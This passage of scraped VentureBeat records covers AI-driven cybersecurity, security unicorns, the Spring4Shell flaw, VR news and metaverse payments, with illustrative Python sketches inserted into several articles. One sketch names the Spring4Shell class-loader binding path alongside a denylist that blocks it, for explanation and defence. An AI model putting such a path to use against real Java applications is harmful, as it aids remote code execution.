2. Account Takeover (ATO) – Cybersecurity teams who define multifactor authentication (MFA) as a standard merely to pass audits and attain regulatory compliance are missing the point and often get hacked with successful account takeover (ATO) attempts. The most reliable approaches to MFA draw on three core factors: something only the user knows, something only the user holds, and something the user is or does. True MFA includes at least two of these three factors. However, getting users’ behavior to change permanently is far more difficult and a longer-term challenge. That’s why enterprises adopt AI and ML-based platforms that can calculate and assign a risk score for each interaction, using a broader set of external variables or indicators aggregated into a series of analytics. AI and ML-based platforms offering protection against ATO are configurable for the relative levels of risk management a given organization wants to take on. When risk scoring identifies a suspicious email or file, the platform automatically quarantines it to protect all users on the network. Leading ATO providers include Avanan, Experian, Iovation, and others. Leading providers of passwordless authentication solutions include Microsoft Azure Active Directory (Azure AD), Ivanti Zero Sign-On (ZSO), OneLogin Workforce Identity, and Thales SafeNet Trusted Access. Ivanti Zero Sign-On is noteworthy for its use of adaptive authentication, including multifactor authentication (MFA) based on risk. Zero Sign-On also relies on biometrics, including Apple’s Face ID, as a secondary authentication factor to access work email, unified communications and collaboration tools, and corporate-shared databases and resources. It’s integrated into the Ivanti Unified Endpoint Management (UEM) platform.
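A hedged sketch of the risk engine such platforms run on each interaction; the signal names, weights, and thresholds below are hypothetical:

```python
def login_risk(signals):
    """Score one login attempt from contextual signals.
    Weights are made up for illustration."""
    weights = {
        "new_device": 30,
        "impossible_travel": 50,   # geo jump faster than travel allows
        "tor_exit_node": 40,
        "recent_failed_logins": 20,
    }
    return sum(weights[s] for s in signals if s in weights)

def auth_decision(signals, allow_below=25, deny_above=70):
    """Map the risk score to an action, like a configurable risk engine."""
    score = login_risk(signals)
    if score >= deny_above:
        return "deny"
    if score >= allow_below:
        return "step_up_mfa"       # require a second factor before proceeding
    return "allow"
```

The allow/step-up/deny cut-offs correspond to the configurable risk appetite the article mentions: a stricter organization simply lowers the thresholds.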
3. Defending against ransomware – Organizations fell victim to a ransomware attack every 11 seconds by 2021, up from every 40 seconds in 2016, and the average cost of a traditional breach reached $3.86 million. Absolute Software has analyzed the anatomy of ransomware attacks and provided key insights in their study. Their analysis of how a ransomware attack takes place is illustrated in the graphic below:

Above: Absolute Software’s anatomy of a ransomware attack illustrates why implementing cybersecurity training, regularly updating anti-virus and anti-malware, and backing up data to a non-connected environment is essential for preventing an attack.

Taking steps to improve the security hygiene of an enterprise, including adopting MFA on every endpoint, is just the starting point. Getting patch management right can make a difference in how secure an enterprise stays when bad actors attempt to launch a ransomware attack. AI and ML are making a difference against ransomware by automating patch management with bots instead of relying on brute-force endpoint inventory methods. AI-powered bots use constraint-based algorithms to pinpoint which endpoints need updates and their probable risk levels. Algorithms use current and historical data to identify the specific patch updates and builds any given endpoint device needs. Another advantage of taking more of a bot-based approach to patch management is how it can autonomously scale across all endpoints and networks of an organization. Automated patch management systems need more historical ransomware data to train AI and machine learning-based models better and fine-tune their predictive accuracy further. That’s what makes the approach taken by RiskSense, which Ivanti recently acquired, noteworthy. Ivanti gained the largest, most diverse data set of vulnerabilities and exposures through the RiskSense Vulnerability Intelligence and Vulnerability Risk Rating.
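The bot-driven prioritization described above can be sketched as a scoring function over an endpoint inventory; the fields and weights are invented for illustration:

```python
def patch_priority(endpoint):
    """Rank an endpoint for patching by combining the severity of its
    missing patches with how exposed the machine is."""
    score = sum(p["cvss"] for p in endpoint["missing_patches"])
    if endpoint.get("internet_facing"):
        score *= 2                 # exposed hosts get patched first
    if endpoint.get("exploit_in_wild"):
        score += 10                # known active exploitation raises urgency
    return score

def patch_queue(endpoints):
    """Order the fleet so the riskiest endpoints are patched first."""
    return sorted(endpoints, key=patch_priority, reverse=True)
```

A real risk-based system would weigh threat intelligence and exploit trends, as the RiskSense ratings do; the point here is only the shape of the prioritization step.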
The risk ratings reflect the future of ML-driven patch management by prioritizing and quantifying adversarial risk based on factors such as threat intelligence, in-the-wild exploit trends, and security analyst validation. Microsoft’s accelerating acquisitions in cybersecurity reflect the priority it is putting on ransomware. In a blog post, Microsoft announced its acquisition of RiskIQ on July 12, 2021. RiskIQ’s services and solutions will join Microsoft’s suite of cloud-native security products, including Microsoft 365 Defender, Microsoft Azure Defender, and Microsoft Azure Sentinel.

4. Identity proofing – Bad actors attempt to create false identities and privileged access credentials with banks, educational institutions, financial services, and health care facilities to defraud the institution and potentially breach its systems. Identity proofing reduces fraud by verifying the identity of new customers when they submit applications for care, enrollment or services, account openings, and balance transfers for new accounts. AI and ML adoption is diverse across the identity proofing market, including identity affirmation and identity proofing tools. ML algorithms rely on convolutional neural networks to assess the authenticity of photo IDs and related photo-based documents, applying attack detection techniques to an image before attempting to match it to the photo ID. Identity proofing and affirmation are both needed to reduce fraud, which is one of the challenges vendors competing in this market are addressing through API-based integration across platforms. Additionally, identity-proofing vendors are seeing exponential growth due to the pandemic, with venture capital firms investing heavily in this area. Identity verification startup Incode, which recently raised $220 million in a Series B funding round led by General Atlantic and SoftBank with additional investment from J.P. Morgan and Capital One, is one of many new entrants in this growing market.
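The final matching step in photo-ID verification can be pictured as comparing embedding vectors (the output of the convolutional networks mentioned above) against a similarity threshold; the vectors and the threshold here are made-up stand-ins for real model output:

```python
import math

def cosine_similarity(a, b):
    """Similarity between two face-embedding vectors, in [-1, 1]."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm

def id_matches_selfie(id_embedding, selfie_embedding, threshold=0.8):
    """Accept the identity claim only if the photo-ID embedding and the
    live-selfie embedding are close enough."""
    return cosine_similarity(id_embedding, selfie_embedding) >= threshold
```

In a real pipeline the attack-detection step (screening the image for tampering or presentation attacks) runs before this comparison, as the article notes.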
5. Process behavior analysis – AI and ML are paying off in this area of cybersecurity today due to their combined strengths at quickly identifying potential breach attempts and acting on them. Process behavior analysis concentrates on identifying anomalous, potentially malicious behavior earlier based on patterns in behavior. As a result, it’s proven particularly effective in thwarting attacks that don’t necessarily carry payloads. An excellent example of process behavior analysis is how Microsoft Defender 365 relies on behavior-based detections and machine learning to identify when endpoints need to be healed and carry out the necessary steps autonomously with no human interaction. Microsoft 365 does this by continually scanning every file in Outlook 365. Microsoft Defender 365 is one of the most advanced behavioral analysis systems supporting self-healing endpoints, capable of correlating threat data from emails, endpoints, identities, and applications. When there’s a suspicious incident, automated investigation results classify a potential threat as malicious, suspicious, or “no threat found.” Defender 365 then takes a series of autonomous actions to remediate malicious or suspicious artifacts. Remediation actions include sending a file to quarantine, stopping a process, isolating a device, or blocking a URL. A Virtual Analyst is also part of the Microsoft 365 Defender suite that provides autonomous investigation and response.

Above: The Microsoft Defender Security Center security operations dashboard monitors potential threats using process behavior analysis techniques, with the data shown above based on an analysis of Endpoint Detection and Response (EDR) real-time activity.

Enterprises need to prioritize cybersecurity in 2022

Improving cybersecurity from the endpoint to the core of IT infrastructures needs to be every enterprise’s goal in 2022.
AI and ML show potential in five core areas to improve cybersecurity, thwart ransomware attempts, and learn from data patterns to predict potential attack scenarios and attack vectors. Attacks happen faster, with greater precision, and with more orchestrated force today than ever before, often relying on machine-to-machine communication. AI and ML stand the best chance of keeping up with the onslaught of cyberattack attempts while also increasing the pace of innovation to outsmart attackers who are always stepping up their efforts. "
15,102
2,022
"Cybersecurity has 53 unicorns. Here are 10 to watch | VentureBeat"
"https://venturebeat.com/2022/03/17/cybersecurity-has-53-unicorns-here-are-10-to-watch"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Cybersecurity has 53 unicorns. Here are 10 to watch Share on Facebook Share on X Share on LinkedIn Tech startups with billion-dollar "unicorn" valuations may be common — but at least in the cybersecurity market, such valuations do typically signify strong revenue growth. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. It’s true: The term unicorn stopped meaning “rare” years ago. And today, in the cybersecurity market alone, there are actually dozens of privately held companies with billion-dollar valuations. But while becoming a unicorn may not mean what it used to, it’s not a meaningless milestone, either. At least in the security market, getting a billion-dollar valuation usually does signify that the startup has a fast-growing business underway, among other things. Dave DeWalt, who knows a thing or two about cyber businesses, said as much to me in an interview last month. 
Though 30 privately held security companies achieved unicorn valuations in 2021 — up from six in 2020 — that doesn’t automatically imply there’s a bubble, said DeWalt, who previously served as CEO of FireEye and McAfee, and is now a venture investor. Many of these security companies are building real businesses, he said — and addressing real threats, often from state-sponsored adversaries, that aren’t going away. Why are we seeing so many security vendors reach unicorn valuations? “It’s because the threat is persistent,” said DeWalt, now the founder and managing director at venture firm NightDragon. “And that’s why I think [these companies are] real, and this is here to stay.”

Tracking the herd

By my tally, there are currently 53 cybersecurity vendors with privately held valuations of $1 billion or more. My main source for this is the CB Insights unicorn list, though my count isn’t identical to theirs (a few security vendors were either missing or classified in other categories besides cybersecurity on their list). Regardless, getting the number of cybersecurity unicorns exactly right doesn’t seem too important. All you need to know is that there are a ton of them now. More crucially: Which security companies, in this ever-expanding unicorn herd, might be worth a closer look for enterprise and midmarket customers? I’ve chosen 10 of the current security unicorns to highlight here. My criteria are that they’re reporting strong growth; they’re in a fast-growing market; and I’ve had the chance to interview their CEO or president in recent months, giving me a sense of their strategy, differentiators and traction with customers. This isn’t to say the other security unicorns aren’t differentiated, seeing significant growth and operating in a hot market.
VentureBeat couldn’t include them all, though (and hasn’t been able to interview all of the unicorn companies’ CEOs as of this point). So, what follows are the key details on these 10 cybersecurity unicorns that are worth watching right now, in areas of the market including cloud security, cloud-native application security, managed detection and response, passwordless identity authentication and zero trust segmentation. Vendors are ranked by their latest available valuation, provided at the time of their most recent funding round. All quotes are from recent VentureBeat interviews, and all metrics were supplied by the vendors.

Snyk
Founded: 2015
Valuation: $8.5 billion (September 2021)
Customers: 1,800 at the end of Q1 (up 100% year-over-year)
Employees: 1,200 at the end of Q1 (up more than 100% year-over-year)

Snyk specializes in offering tools for scanning and fixing code — built to be familiar to developers and integrated into the existing development process — with the aim of ensuring that applications are built securely from the get-go. The company believes that in order to provide a great developer security platform, “it should be weaved into the daily lives of the development teams,” said Snyk cofounder and president Guy Podjarny. “We’re there to cover the full scope of the cloud-native application — always with that developer-first approach.” Snyk is now expanding its offerings to include cloud security, with the recent acquisition of Fugue. By combining with Fugue’s cloud security posture management technology, the Snyk platform will be able to provide developers with “continuity all the way from their code to the cloud deployments,” Podjarny said. “To equip developers with building secure software and owning it, they have to go past the pipelines into understanding what is deployed,” Podjarny said.
That includes “understanding what security mistakes are deployed,” he said, “so they can own that and they can help secure it.”

Lacework
Founded: 2014
Valuation: $8.3 billion (November 2021)
Customers: Total number not disclosed; by the end of 2021, Lacework saw a 3.5X year-over-year increase in new customers
Employees: More than 1,000 (up from 200 in January 2021)

Lacework offers a cloud security platform that excels at collecting, processing and normalizing data across cloud environments — and then deriving insights for customers, Lacework co-CEO Jay Parikh said. “We fundamentally bring a different approach,” Parikh said. “And we can innovate faster and we can provide a much more comprehensive, end-to-end approach.” Central to Lacework’s technology is the Polygraph Data Platform, which collects and correlates data in cloud environments, detects potential security issues and prioritizes the biggest threats for response. Key capabilities include anomaly detection powered by machine learning, as well as deep visibility across cloud and container workloads. Notably, Lacework brings the ability to both scan for vulnerabilities and also show in production where the flaws might be exploited, Parikh said. “Some companies can just do the scanning, but they can’t do the production analysis,” he said. “We can do both, and it’s all on the same platform.”

Wiz
Founded: 2020
Valuation: $6 billion (October 2021)
Customers: Total number not disclosed; “more than 20% of the Fortune 500”
Employees: More than 200

Wiz offers a cloud security product that unifies a number of different capabilities, deploys quickly, provides broad visibility and enables customers to prioritize threats, according to two of the startup’s founders, CEO Assaf Rappaport and vice president of product Yinon Costica. The product’s agentless approach helps enable the rapid deployment, the founders said.
“Literally you can finish a Wiz deployment in a week, even in the largest enterprises,” Costica said. Wiz works by implementing a security graph, allowing for the correlation of the many different signals in cloud environments — prioritizing the risks “very effectively across even the largest environments,” he said. The product “changes dramatically the way organizations are able to gain visibility to cloud environments,” Costica said. “I think these two components — the ability to prioritize effectively and to deploy really easily — are making the difference for customers, versus what they have today,” he said.

Arctic Wolf
Founded: 2012
Valuation: $4.3 billion (July 2021)
Customers: 2,700 (up from 1,500 a year ago)
Employees: 1,500 (up from 650 a year ago)

With Arctic Wolf’s security operations platform — which offers a full gamut of security solutions, paired with the ability to ingest security data from a customer’s existing tools — the company has the potential to “unify the cybersecurity market wholesale,” CEO Nick Schneider said. The platform includes 24/7 monitoring of endpoints, networks and clouds; detection of threats; and response and recovery if a cyberattack occurs. The MDR service is provided by a concierge security team that serves to eradicate false positives and alert fatigue. Arctic Wolf’s MDR is complemented by digital risk management (tailored to each individual customer); managed security awareness (providing security training, phishing tests and coaching to employees); and cloud detection and response (to help with improving cloud security posture). While a number of other security vendors offer some of these solutions, “that combination of modules, or that combination of outcomes sitting on top of the platform — we’re really the only vendor that does that,” Schneider said.
“And from a customer’s perspective, what that means is they get a unified experience across those different areas of their business — detection, risk, cloud, security awareness and training.”

Illumio
Founded: 2013
Valuation: $2.75 billion (June 2021)
Customers: Total number not disclosed; company has added more than 140 customers in the past year
Employees: 519 (up from 384 a year ago)

Illumio offers zero-trust segmentation solutions for both datacenter and cloud environments, which enable isolation of attackers post-breach. With the Illumio zero-trust segmentation solution, a customer’s cloud and datacenter environments can be broken down into different segments — all the way down to the level of workload — which can each be locked down with their own security controls. Illumio stands out as “the only standalone zero-trust segmentation company,” said cofounder and CEO Andrew Rubin. “We started the company to solve this problem. We’ve built our technology specifically to address it. And at some of our largest customers, we address it at massive global scale.” Ultimately, “we are focused on only solving this problem,” Rubin said. “And we believe that that has allowed us to build a better platform and a more scalable platform.”

Sysdig
Founded: 2013
Valuation: $2.5 billion (December 2021)
Customers: 700 at the end of 2021 (roughly doubled year-over-year)
Employees: Nearly 600 (up from roughly 250 a year ago)

Container and cloud security vendor Sysdig offers a security platform that provides more in-depth visibility and better prioritization of threats than other vendors, CEO Suresh Vasudevan said. The platform’s “open source foundation” — it’s built on top of two open-source threat detection projects — has also continued to help set the company apart, Vasudevan said. Sysdig’s platform offers capabilities spanning cloud-native application development security; detection and response to runtime threats; and management of configurations and permissions.
“The fact that we’ve built an end-to-end platform allows us to have a much better sense of how to prioritize, what to focus on, and how to remediate issues at the source — at the time when you’re building your software rather than much later when you’re deployed in production,” Vasudevan said.

Orca Security
Founded: 2019
Valuation: $1.8 billion (October 2021)
Customers: “Hundreds of customers” (up 400% year-over-year)
Employees: 307 (up from 71 a year ago)

Orca Security offers a cloud protection platform that unites several different tools and doesn’t require an agent, simplifying and expediting the deployment of the platform. The biggest value for customers is “having one platform that leverages data from the entire stack to prioritize risk,” CEO and cofounder Avi Shua said. In that way, Orca can surface not just the underlying security issue, but also its business impact, Shua said. Using Orca’s “SideScanning” technology that collects data from cloud environments, the platform provides full visibility of cloud environments and connects the dots in security alert data to enable risk prioritization, Shua said. Key capabilities include solutions for managing cloud vulnerabilities; spotting misconfigurations in cloud accounts and workloads; and detecting malware and lateral movement in cloud environments.

Beyond Identity
Founded: 2020
Valuation: $1.1 billion (February 2022)
Customers: Total number not disclosed; customer base grew 640% in 2021, year-over-year
Employees: 185 (up from 118 a year ago)

Beyond Identity has developed a solution for multifactor authentication (MFA) that’s focused on “cutting out the friction — making it truly invisible to a user, or to a company, that they’ve turned on MFA,” said cofounder and CEO Tom “TJ” Jermoluk. A key element is that the MFA solution is passwordless, accomplished through cryptographically embedding a user’s identities into their devices.
“Our users don’t have to look at a one-time code or a push notification, or any of that,” Jermoluk said. When a user opens an application on their PC or smartphone, using the company’s system, the user can be automatically logged in without needing to enter any information. Beyond Identity also provides a zero trust “risk engine” that ensures only valid users can authenticate, Jermoluk said — which “allows us to have this visibility that nobody else can get” in an identity security solution. Among the goals for Beyond Identity, he said, is “to have this platform be adopted as the de facto zero trust platform.” Ultimately, Beyond Identity brings the opportunity to “solve so many of the different problems that have existed [in security] with one platform,” Jermoluk said.

BlueVoyant
Founded: 2017
Valuation: “Substantially more than $1 billion” (February 2022)
Customers: More than 700 at the end of 2021 (up 80% year-over-year)
Employees: Nearly 600 (almost doubled from a year ago)

BlueVoyant provides both internal security and external cyber risk management for customers. The company’s managed detection and response (MDR) offering stands out with capabilities for analyzing massive amounts of data as part of its threat detection, according to BlueVoyant cofounder and CEO Jim Rosenthal. And when it comes to external cyber risk management, what BlueVoyant offers is one-of-a-kind, Rosenthal said. “We do supply chain defense, as opposed to supply chain risk scoring,” he said. BlueVoyant looks at every participant in a customer’s supply chain, and identifies any externally detectable, severe vulnerabilities that an attacker would see. The company then interacts with the supplier to make sure that the issues are remedied — solving the problem on the customer’s behalf, Rosenthal said. As of right now, when it comes to supply chain defense of this type, “no one else does it,” Rosenthal said.
“And it is what the world needs — if you want to prevent attackers from either disrupting your operations, or disrupting the supply chain, or moving upstream in an operation to the enterprise itself.”

Aqua Security
Founded: 2015
Valuation: “In excess of $1 billion” (March 2021)
Customers: More than 450 (up from 400 a year ago)
Employees: 530 (up from 300 a year ago)

Aqua Security offers a cloud-native application protection platform that spans the app development lifecycle, with capabilities for securing the build, infrastructure and workload/runtime. The company acquired a startup in December, Argon, that adds a solution for securing the software supply chain to the platform, as well. When it comes to securing cloud-native technologies such as containers and microservices, there is now “a clear realization in the market that [companies’] existing security solutions do not apply for this new stack,” said cofounder and CEO Dror Davidoff. Aqua’s various modules are offered individually, but are also integrated in order to “connect the dots” and provide a full security picture for a customer’s cloud-native stack, Davidoff said. The company has been investing heavily to “create a lot of complementary value between the different modules — and really turn it into one solution,” he said. Ultimately, “I can say very comfortably that we’re the one that’s really looking at the complete lifecycle — from your software supply chains all the way to your production, and having all the [solutions] along the way,” Davidoff said.
VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,103
2,022
"Spring4Shell vulnerability likely to affect real-world apps, analyst says | VentureBeat"
"https://venturebeat.com/2022/03/30/spring4shell-vulnerability-likely-to-affect-real-world-apps-analyst-says"
"Spring4Shell vulnerability likely to affect real-world apps, analyst says

More answers are emerging about the potential risks associated with a newly disclosed remote code execution (RCE) vulnerability in Spring Core, known as Spring4Shell — with new evidence pointing to a possible impact on real-world applications. While researchers have noted that comparisons between Spring4Shell and the critical Log4Shell vulnerability are likely inflated, analysts Colin Cowie and Will Dormann separately posted confirmations Wednesday, showing that they were able to get an exploit for the Spring4Shell vulnerability to work against sample code supplied by Spring. “If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE,” Dormann said in a tweet.
Still, as of this writing, it’s not clear how broad the impact of the vulnerability might be, or which specific applications might be vulnerable. That alone would appear to suggest that the risk associated with Spring4Shell is not comparable to that of Log4Shell, a high-severity RCE vulnerability that was disclosed in December. That vulnerability affected the widely used Apache Log4j logging library and was believed to have impacted most organizations. Still to be determined about Spring4Shell, Dormann said on Twitter, is the question of “what actual real-world applications are vulnerable to this issue?” “Or is it likely to affect mostly just custom-built software that uses Spring and meets the list of requirements to be vulnerable,” he said in a tweet. Spring is a popular framework used in the development of Java web applications.

Vulnerability details

Researchers at several cybersecurity firms have analyzed and published details on the Spring4Shell vulnerability, which was disclosed on Tuesday. At the time of this writing, patches are not yet available. Security engineers at Praetorian said Wednesday that the vulnerability affects Spring Core on JDK (Java Development Kit) 9 and above. The RCE vulnerability stems from a bypass of CVE-2010-1622, the Praetorian engineers said. The Praetorian engineers said they have developed a working exploit for the RCE vulnerability. “We have disclosed full details of our exploit to the Spring security team, and are holding off on publishing more information until a patch is in place,” they said in a blog post. (Importantly, the Spring4Shell vulnerability is different from the Spring Cloud vulnerability that is tracked as CVE-2022-22963 and that, confusingly, was disclosed at around the same time as Spring4Shell.)
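The class of bug Praetorian describes (a bypass of the decade-old CVE-2010-1622) involves property binding: request parameter names are treated as dotted property paths on a form-backing object, and a crafted path can reportedly walk from that object into ClassLoader internals on JDK 9 and above. The mechanism, and the denylist-style workaround that circulated before patches landed, can be illustrated with a conceptual sketch. This is Python for brevity, not Spring code and not an exploit; the `bind` helper and `Greeting` class are invented for illustration only:

```python
# Conceptual sketch only. It shows why treating attacker-controlled request
# parameter names as dotted property paths is dangerous, and how a
# denylist-style check rejects suspicious paths before any binding happens.

def bind(obj, path, value, disallowed=()):
    """Set `value` on `obj` by walking a dotted property path."""
    for pattern in disallowed:
        if pattern in path.lower():
            raise PermissionError(f"binding to {path!r} is disallowed")
    parts = path.split(".")
    target = obj
    for name in parts[:-1]:
        # Each hop is attacker-controlled; in the Java case, a path such as
        # "class.module.classLoader..." hops from the form object into
        # runtime internals instead of staying on ordinary form fields.
        target = getattr(target, name)
    setattr(target, parts[-1], value)

class Greeting:
    """Stand-in for an ordinary form-backing object."""
    message = "hello"

g = Greeting()
bind(g, "message", "hi")  # legitimate form binding still works
try:
    # With a "class." denylist (the spirit of the published workaround),
    # the dangerous path is rejected before any traversal occurs.
    bind(g, "class.module.classLoader", "x", disallowed=("class.",))
except PermissionError as exc:
    print(exc)
```

The point of the sketch is that the fix is a gate on the path string itself, applied before binding, rather than an attempt to sanitize whatever the path reaches.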
The bottom line with Spring4Shell is that while it shouldn’t be ignored, “this vulnerability is NOT as bad” as the Log4Shell vulnerability, cybersecurity firm LunaSec said in a blog post. All attack scenarios with Spring4Shell, LunaSec said, “are more complex and have more mitigating factors than Log4Shell did.” "
15,104
2,022
"AR/VR News | VentureBeat"
"https://venturebeat.com/category/arvr"
"AR/VR

Why the lack of metaverse integration in today’s VR ecosystem needs to be addressed
The misperception of 3D perception: Debunking notions from cost to capabilities
Jadu launches NFT avatars as it prepares for the AR metaverse
VR basketball app Gym Class raises $8M ahead of fall launch
Community: Understanding the evolution of the metaverse for business
Community: The metaverse: A safe space for all?
Community: The metaverse in retail: A game-changer that’s not ready yet
Community: How big data could form the cornerstone of the metaverse
Immersive Gamebox announces full-scale interactive Squid Game
Meta increases the price of Meta Quest 2 VR headsets by $100
Hackers can see what you’re doing in VR via Big Brother malware
Community: Designing the metaverse: Challenges and questions
Community: Medicine and the metaverse: New tech allows doctors to travel inside of your body
Community: Why the metaverse won’t fall to Clubhouse’s fate
Community: Improving the customer experience with virtual and augmented reality
The DeanBeat: RP1 simulates putting 4,000 people together in a single metaverse plaza
MeetKai launches AI-powered metaverse, starting with a billboard in Times Square
Magic Leap 2 mixed reality headsets for enterprise will debut for $3,300 on September 30
Beyond Inclusion builds workforce diversity for the metaverse
Community: A new milestone in augmented reality: Functional contact lenses
Community: We should replicate the unique properties of cash in the digital realm
Community: Web3 gaming has bigger challenges than the crypto winter
VR enthusiasts can finally cut the Facebook cord next month
Resolution Games reveals record growth in VR/AR game downloads
Community: Three ways augmented reality affects consumer psychology
Echo3D raises $5.5M for cloud authoring tools for 3D, AR, and VR content
Community: How NFTs in the metaverse can improve the value of physical assets in the real world
Rec Room hits 75M lifetime users and $1M in creator payouts for Q1
Community: In a world where AR/VR is widely adopted by the population, what will advertising look like?
Mark Zuckerberg unveils ultra-realistic VR display prototypes
Community: The future of the creator economy in a Web3 world
Community: Can humanity be recreated in the metaverse?
Nreal is bringing Steam to AR, and hosting a hackathon
Kaleidoco raises $7M to blend Web3 and AR entertainment
Blippar facilitates AR content creation through its integration with Microsoft Teams
Community: Strategies for the ecommerce metaverse journey
Community: Entering the metaverse: How companies can take their first virtual steps
Community: Web3 is a myth, and that’s okay
Community: Why leaders need to prepare to run a blended reality business
Among Us VR set to launch during holiday season, gets new trailer
"
15,105
2,017
"Google bags Job Simulator studio Owlchemy Labs in VR's latest exit | VentureBeat"
"https://venturebeat.com/2017/05/10/google-gets-into-vr-game-development-with-acquisition-of-job-simulators-owlchemy-labs"
"Google bags Job Simulator studio Owlchemy Labs in VR’s latest exit

Rick and Morty now work for Google. One of the most successful virtual reality game studios is now a part of one of the world’s biggest corporations. Google revealed today that it has acquired Owlchemy Labs, the studio that is best known for developing popular HTC Vive launch game Job Simulator. This acquisition gives Google a talented in-house team that can build content for its Daydream VR headsets that work with select Android smartphones. In its blog post announcing the deal to bring Owlchemy under the Google banner, Google VR engineering director Relja Markovic explained that the company’s existing content teams will partner with Owlchemy to build new experiences. Markovic also suggested that Owlchemy will continue working on other VR platforms like Vive, Oculus Rift, and more.
The two parties did not disclose how much Google spent to acquire the studio. Owlchemy has helped define VR for many people. Job Simulator is a game where you experience a museum of jobs through a series of silly interactions. The game also got a chance to prove itself to a mass audience when it appeared on the late-night program Conan. Owlchemy’s follow-up VR game, Rick and Morty: Virtual Rick-ality, debuted in April, and it presented players with a similar set of bizarre, interactive challenges. “Today, we’re thrilled to welcome Owlchemy Labs to Google,” wrote Markovic. “They’ve created award-winning games like Job Simulator and Rick and Morty: Virtual Rick-ality which have really thoughtful interactive experiences that are responsive, intuitive, and feel natural. They’ve helped set a high bar for what engagement can be like in virtual worlds, and do it all with a great sense of humor.” In January, Owlchemy revealed that Job Simulator was a sales hit: through 2016, it grossed more than $3 million in revenues. Since debuting for the Vive, the game has made the move to Oculus Rift and PlayStation VR. It was so popular that the studio even released a physical version of the game for Sony’s PS4 console. This move is also indicative of Google’s commitment to VR, and not just as a hardware or experiential exercise. Owlchemy is a game studio, and now Google can actively produce gaming content internally for head-mounted displays without necessarily having to work with outside partners. GamesBeat's creed when covering the game industry is "where passion meets business." What does this mean? We want to tell you how the news matters to you -- not just as a decision-maker at a game studio, but also as a fan of games. Whether you read our articles, listen to our podcasts, or watch our videos, GamesBeat will help you learn about the industry and enjoy engaging with it. Discover our Briefings. "
15,106
2,022
"What's it going to take to get cryptocurrency widely accepted? | VentureBeat"
"https://venturebeat.com/2022/01/27/whats-it-going-to-take-to-get-cryptocurrency-widely-accepted"
"VB Event
What’s it going to take to get cryptocurrency widely accepted?

The metaverse doesn’t quite exist yet, but it’s just the dusk before the dawn. And when it does finally burst into life, commerce and transactions are going to be central to so much of the activity within it. Industry experts dove into the topic today during the “Transacting in the Metaverse” panel at the GamesBeat “Into the Metaverse” Summit. Dean Takahashi, lead writer of GamesBeat, hosted Chris Smith, founder of BIG Esports; Josh Marcus, COO at Rumble Gaming; and Evan Heby, senior marketing manager of Tipalti, in a wide-ranging conversation about tokens, cryptocurrencies, NFTs, and other transactions in today’s virtual spaces and tomorrow’s metaverse. There’s a long road to go before everyone feels that these forms of currency are safe and secure, and they become universal. How do we get there?
“What we’re seeing is a move, first and foremost, from some of the traditional methods of payment you might see, checks and things like that, to digital versions of that, whether it’s an echeck or wire or ACH,” Heby said. “But we also predict that we’ll see even more movement as the metaverse develops, and as people build more of that trust with the cryptocurrencies, and feel that there’s a lot of value behind things like NFTs. People will start to be more willing to get paid in those forms.” Cryptocurrency will become far more trusted and far more universal when it’s the answer to a problem that needs to be solved, Smith said — and that’s part of why many gamers reject the idea of NFTs. There’s a tremendous amount of potential for things like smart contracts in a broad array of industries, from gaming and insurance to payment platforms and processors, and contracts with talent. “Blockchain isn’t going to solve everything all the time, at least not right now,” he said. “We need to have a way that it’s going to benefit [players], because otherwise we get the bad PR that we’ve seen with gamers. Triple-A gaming studios try to shove NFTs in there because it’s the cool word, the cool thing to say.”

Advertising and transactions in the metaverse

Heby predicted that the first major move in transactions that we’ll see in metaverses is advertising companies making land grabs, very similar to what Nike did recently within Roblox. It’s a familiar narrative of development and progress in the real world, where real estate gets bought up, and then the infrastructure gets built on that. “We’ll start seeing cutting-edge companies invest real marketing dollars — in traditional currencies, not necessarily crypto — to benefit the long-term health and wellness of their businesses,” he said.
“In terms of types of transactions today, it’s still heavily based in fiat currencies like we’re talking about. But that has an opportunity to change toward crypto, toward NFTs, toward tokenization very quickly.” Companies may also start to do pop-up shops and sell clothes or merchandise, or companies like FaZe Clan might take the opportunity to make a land grab, he said.

Trust, shared belief, and cryptocurrency

The key to helping people understand this space is the concept of digital ownership and digital assets generally, Marcus said. A skeptic might see an artistic NFT, a poorly drawn ape, and wonder why anyone would put a six-figure value on ownership of something they could screenshot. “But when you unpack it, it’s not about the ape, it’s about the underlying technology that allows anyone with that technological know-how to confirm that I own the NFT to the exclusion of all others,” he said. Ownership in the real world can be considered a bundle of rights — when you buy land, you have the right to build a house on it, the right to grow vegetables on it, the right to sell it. If you can prove that you own the rights to this ape, you can also prove that you own the rights to other digital assets. You can own one of Stella Artois’ digital horses and race it against other digital horses, own land in a digital world and develop it, and charge others for the right to enter a digital world. “It’s about a shift in perception of property, the ownership of an asset not being limited only to the physical world, but expanding that to the digital world,” he said. “It’s going to take time, for sure, but as we start to see more utility in these digital assets, we’ll start to see greater acceptance and understanding of it generally.”

Transaction nirvana

Predictions about cryptocurrency and transactions in the metaverse can be made with varying amounts of gravitas, but no one really knows where it will end up.
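The ownership property Marcus unpacks (anyone can verify who holds a token, and only the holder can transfer it) comes down to a public mapping from token IDs to addresses. A toy sketch makes the point; this is plain Python, not an actual ERC-721 contract, and the `TokenLedger` class and its method names are invented for illustration:

```python
# Toy illustration: "owning" a token is a public mapping from token ID to
# owner. Anyone can read the mapping, but only the recorded owner can
# change it -- which is why a screenshot of the artwork changes nothing.

class TokenLedger:
    def __init__(self):
        self._owner_of = {}  # token_id -> owner address

    def mint(self, token_id, owner):
        if token_id in self._owner_of:
            raise ValueError("token already minted")
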